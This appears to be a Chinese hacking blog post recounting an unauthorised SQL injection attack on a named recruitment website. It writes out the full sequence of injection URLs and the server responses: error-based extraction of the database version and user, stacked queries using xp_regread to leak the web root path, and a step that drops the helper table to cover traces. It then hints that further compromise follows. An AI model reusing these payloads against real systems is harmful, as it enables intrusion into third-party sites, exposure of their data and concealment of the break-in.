今天上了一個(gè)人才招聘網(wǎng)站，對(duì)他們的招聘系統(tǒng)我很感興趣，aspx結(jié)尾的，看來(lái)是.net的程序，這樣的網(wǎng)站會(huì)不會(huì)有什么漏洞呢？順便打開一條消息 http://www.cnwill.com/NewsShow.aspx?id=4847 ，然后加一個(gè)' 看看出現(xiàn)什么？我暈。。
Source: .Net SqlClient Data Provider
Description: 字符串 '' 之前有未閉合的引號(hào)。
TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)
似乎有可能，然后 1=1 正常 1=2出錯(cuò)。。這和asp的似乎沒(méi)有區(qū)別阿。。于是把NBSI掛上了，竟然也可以猜出表名來(lái)，和ASP沒(méi)區(qū)別。不過(guò)NBSI不認(rèn)識(shí)這里的出錯(cuò)信息，只能按照沒(méi)有提示的方式破。。先暫停一下NBSI，輸入
http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>(select%20@@version)--
提示：
Source: .Net SqlClient Data Provider
Description: 將 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤。
TargeSite: Boolean Read()
是個(gè)2000的Enterprise server而且SP4了。。然后
_name">http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>user_name()
提示：
Source: .Net SqlClient Data Provider
Description: 將 nvarchar 值 'dbo' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤。
TargeSite: Boolean Read()
哦？用dbo的身份連接？應(yīng)該有搞頭。。
首先按照破解ASP網(wǎng)站的方法，要他的絕對(duì)路徑用以下，第一步建立一個(gè)表：
http://www.cnwill.com/NewsShow.aspx?id=4844;create%20table%20[dbo].[cyfd]([gyfd][char](255))--
把web路徑寫進(jìn)去
http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
還是讓他不匹配，顯示錯(cuò)誤
http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
得到提示：
Source: .Net SqlClient Data Provider
Description: 將 varchar 值 'Y:\Web\煙臺(tái)人才熱線后臺(tái)管理系統(tǒng),,201 ' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤。
TargeSite: Boolean Read()
哈哈哈。。路徑暴露了。。
接下來(lái)刪除痕跡
http://www.cnwill.com/NewsShow.aspx?id=4844;drop%20table%20cyfd;--
后邊該怎么做就不多說(shuō)了。。和攻擊ASP的網(wǎng)站一樣。。